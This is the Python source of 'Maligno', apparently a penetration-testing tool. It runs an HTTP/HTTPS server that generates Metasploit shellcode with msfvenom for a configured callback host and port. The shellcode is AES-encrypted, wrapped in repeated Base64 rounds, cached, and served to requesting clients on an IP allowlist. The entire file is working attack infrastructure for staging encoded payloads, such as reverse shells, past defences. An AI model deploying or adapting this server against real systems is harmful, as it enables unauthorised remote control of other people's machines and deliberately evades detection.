#!/usr/bin/python

################################################################
#                                                              #
# Maligno - A Metasploit payload server                        #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013 Encripto AS. All rights reserved.             #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################
#                                                              #
# Inspired by AES Encrypted Reverse HTTP Listener              #
# by David Kennedy                                             #
#                                                              #
# Copyright 2012 TrustedSec, LLC. All rights reserved.         #
#                                                              #
################################################################


import re, os, base64, subprocess, ConfigParser, os, sys, ipcalc, ssl
from Crypto.Cipher import AES
from datetime import datetime
from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer


__version__ = "0.6"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    print "|  Maligno v{0}: A Metasploit payload server\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
# Imports server configuration and does a few basic checks
def get_server_config(config_file):
    config_variables = [
        "msfpath", "msfpayload", "msflhost", 
        "msflport", "msfencoder", "msfiterations", 
        "msfcache", "msfcachefile", "base64rounds", 
        "blocksize", "paddingchar", "secret", 
        "scope", "srvport", "ssl", "sslcert", "banner", "reqparam"
        ]

    config = ConfigParser.ConfigParser()
    config.readfp(open(config_file))
    
    server_config = config.items("Metasploit")
    server_config += config.items("Encryption")
    server_config += config.items("Scope")
    server_config += config.items("Server")
            
    for e in server_config:
        if e[0] not in config_variables:
            print "\n[-] Server config variable duplicated or not recognized: {0}\n".format(e[0])
            sys.exit()
        
        if not e[1]:
            print "\n[-] Server config variable is empty: {0}\n".format(e[0])
            sys.exit()
        
        config_variables.remove(e[0])
    
    if config_variables:
        print "\n[-] Server config variables are missing: {0}".format(str(config_variables).strip("[]").replace("'", ""))
        sys.exit()
    
    return dict(x[0:] for x in reversed(server_config))


# Gets and expands the scope defined in the server config
def get_scope_from_server_config(server_config):
    config = server_config["scope"].replace(' ', '').split(',')
    scope = []
    
    for ip in config:
        if ip.find("/") > -1:
            for c in ipcalc.Network(ip):
                scope.append(str(c))
        else:
            scope.append(ip)
    
    return scope


# Gets the Metasploit payloads defined in the server config
def get_payloads_from_server_config(server_config):
    return server_config["msfpayload"].replace(' ', '').split(',')


# Encrypts a plaintext with AES, and encodes the results with rounds of Base64
def pack_data(plaintext, block_size, padding_char, cipher, encoding_rounds):
    padded = plaintext + (block_size - len(plaintext) % block_size) * padding_char
    ciphertext = cipher.encrypt(padded)
    
    for i in range(0, encoding_rounds):
        ciphertext = base64.b64encode(ciphertext)
    
    return ciphertext


# Decodes and decrypts a Base64 encoded / AES encrypted ciphertext
def unpack_data(ciphertext, block_size, padding_char, cipher, encoding_rounds):
    for i in range(0, encoding_rounds):
        ciphertext = base64.b64decode(ciphertext)
    
    return cipher.decrypt(ciphertext).rstrip(padding_char)


# Generates a payload with msfvenom
def generate_shellcode(
        msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_rounds):
            
    p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread -e %s -i %s -f c -b \\x00\\xff" % 
        (msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_rounds), stdout=subprocess.PIPE, shell=True)
        
    s = p.communicate()[0].split("unsigned char buf[] = ")[1]
    return s.replace("\n", "").replace('"', "").replace(";", "").replace("+", "").replace(" ", "").rstrip()
    

# Stores an encrypted / encoded payload in cache
def store_package_in_cache(cache_file, package):
    try:
        fw = open(cache_file, 'w')
        fw.write(package)
        fw.close()
        
    except IOError:
        print "[-] Could not store package in cache."
    
    return
    

# Reads an encrypted / encoded payload from cache
def read_package_from_cache(cache_file):
    package = ""
    try:
        fr = open(cache_file, 'r')
        package = fr.readline()
        fr.close()
    
    except IOError:
        print "[-] Could not find {0}. Generating shellcode on the fly instead...".format(cache_file)
    
    return package
   
    
class GetHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        
        # Set server version (banner)
        self.server_version = server_config["banner"]
        self.sys_version = ""
        
        # Display incoming request
        print "\n[{0}]".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        print "\n[*] New request arrived from {0}...".format(self.client_address[0])
        
        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope) or ("ANY" in scope):
            try:
                
                # The server should process requests with a certain URL parameter
                query = urlparse(self.path).query
                payload_id = int(dict(q.split("=") for q in query.split("&")).get(server_config["reqparam"]))
                
                # Select payload and cache file 
                if payload_id >= 0 and payload_id <= len(payloads):
                    msf_payload = payloads[payload_id]
                    cache_file = str(payload_id) + "-" + server_config["msfcachefile"]
                    print "[+] Requested payload OK..."
                
                # Uses the first configured payload if not found
                else:
                    msf_payload = payloads[0]
                    cache_file = "0-" + server_config["msfcachefile"]
                    print "[-] Requested payload not found. Using first payload from server config instead..."
                    
                # Generate a payload on the fly, if nothing is retrieved from the cache    
                package = ""
                if server_config["msfcache"] == "true":
                    print "\n[*] Trying to reuse packed shellcode from cache file {0}...".format(cache_file)
                    package = read_package_from_cache(cache_file)
                
                if not package:
                    print "\n[*] Generating shellcode {0} with msfvenom...".format(msf_payload)
                    shellcode = generate_shellcode(server_config["msfpath"], 
                                                   msf_payload, 
                                                   server_config["msflhost"], 
                                                   server_config["msflport"], 
                                                   server_config["msfencoder"], 
                                                   server_config["msfiterations"])
                    
                    # Encrypt and encode the payload
                    print "\n[*] Packing shellcode with AES and {0} round(s) of Base64...".format(server_config["base64rounds"])
                    package = pack_data(shellcode, 
                                        int(server_config["blocksize"]), 
                                        server_config["paddingchar"], 
                                        cipher, 
                                        int(server_config["base64rounds"]))
                    
                    # Store the encrypted / encoded payload for later use
                    print "[*] Caching packed shellcode..."
                    store_package_in_cache(cache_file, package)
                
                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                self.send_header("Content-type", "text/html")
                self.end_headers()
                self.wfile.write(package)
                print "\n[+] Package sent!"
                
            except ValueError:
                print "[-] Request with unexpected format. Ignoring it...\n"
            
        else:
            print "[-] Host not in scope!\n"
            self.send_response(200)
            self.end_headers()
        
        print "\n[*] End of request\n"
        return


if __name__ == '__main__':
    
    # Read config and start server
    header()
    
    print "[*] Starting Maligno..."
    print "[*] Reading server configuration..."

    server_config = get_server_config("server.conf")
    scope = get_scope_from_server_config(server_config)
    payloads = get_payloads_from_server_config(server_config)
    cipher = AES.new(server_config["secret"])
    
    try:
        server = HTTPServer(('', int(server_config["srvport"])), GetHandler)
        
        # If ssl is enabled, try to locate the SSL cert file
        if server_config["ssl"] == "true":
            cert = open(server_config["sslcert"], 'r')
            cert.close()
            print "[*] SSL certificate file found. SSL enabled..."
            server.socket = ssl.wrap_socket (server.socket, certfile=server_config["sslcert"], server_side=True)
        
        print "[*] Maligno is up and running. Press CTRL+C to stop...\n"
        server.serve_forever()
    
    except ValueError:
        print "[-] A valid port must be provided in server config.\n"
        sys.exit()
        
    except IOError as e:
        if e.errno == 2:
            print "[-] Could not find SSL certificate file: {0}.\n".format(server_config["sslcert"])
            
        else:
            print "[-] Error: {0}...\n".format(e.strerror)
            
        sys.exit()

    except KeyboardInterrupt: 

        # Remove cache files when interrupted
        print "\n[*] Removing cache file(s)..."
        filelist = [ f for f in os.listdir(".") if f.endswith(server_config["msfcachefile"]) ]
        for f in filelist:
            os.remove(f)
            
        print "[*] Stopping Maligno...\n"
        sys.exit()